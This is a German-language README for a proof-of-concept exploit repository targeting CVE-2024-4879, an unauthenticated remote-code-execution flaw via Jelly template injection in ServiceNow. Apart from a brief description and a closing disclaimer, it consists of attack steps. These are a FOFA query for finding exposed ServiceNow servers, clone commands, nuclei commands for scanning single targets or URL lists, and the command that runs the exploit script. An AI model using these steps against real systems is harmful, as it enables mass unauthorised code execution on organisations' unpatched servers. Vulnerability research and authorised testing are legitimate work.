
Jelly Template Injection-Schwachstelle in ServiceNow | POC CVE-2024-4879
ServiceNow hat eine Eingabevalidierungsschwachstelle behoben, die in den Now Platform Releases Vancouver und Washington, D.C. identifiziert wurde. Diese Schwachstelle könnte es einem nicht authentifizierten Benutzer ermöglichen, aus der Ferne Code im Kontext der Now Platform auszuführen.
FOFA : "server : servicenow"
git clone https://github.com/fa-rrel/CVE-2024-4879.git
cd CVE-2024-4879
Einzelnes Ziel:
nuclei -u https://target.com -t CVE-2024-4879.yaml -nh
Mehrere Ziele:
nuclei -l urls.txt -t CVE-2024-4879.yaml -nh
python3 CVE-2024-4879.py -i (192.168.1.1)
// Haftungsausschluss // Hacking ohne Erlaubnis ist illegal. Dieses Repository dient ausschließlich zu Bildungszwecken im Bereich Cybersicherheit, insbesondere ethisches Hacking, Penetrationstests und Bug Hunting, damit wir uns vor den echten Hackern schützen können.